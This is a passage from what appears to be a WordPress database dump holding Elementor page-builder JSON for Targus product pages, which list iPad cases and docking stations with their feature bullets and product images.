<\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ74413GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8d2137\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1467ed2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Pro-Tek\\u2122 <\\/strong><strong>Rotating Case <\\/strong><strong>12.9-inch iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ748GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"44f9857\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e380076\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Classic Case for <\\/strong><strong>12.9-inch <\\/strong><strong>iPad\\u00ae Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ749GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c30185\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4ec1175\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23ccf88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro (11-inch) - Burgundy\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c06e0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30b6c65\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\\\" alt=\\\"Pro-Tek\\u2122 Rotating Case for iPad Pro (11-inch) - Black\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"16573a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"44ec04c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Classic Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"907f6a3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6718b07\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc7a527\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black, Red &amp; Burgundy<\\/li><li>Passes military grade 4\\u2019 drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6601d39\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27e4cb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design delivers practical protection and enhances stability<\\/li><li>Patented custom-molded tray with reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing<\\/li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"780ec47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb1d3b2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e704695\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"39b318b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df3be40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba13e6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe249f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"278724c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"027329b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8875,3693,'_elementor_css','a:5:{s:4:\"time\";i:1572919697;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8885,3695,'_wp_page_template','template-fullwidth.php'),(8886,3695,'_elementor_edit_mode','builder'),(8887,3695,'_elementor_template_type','wp-page'),(8888,3695,'_elementor_version','2.7.4'),(8889,3695,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: 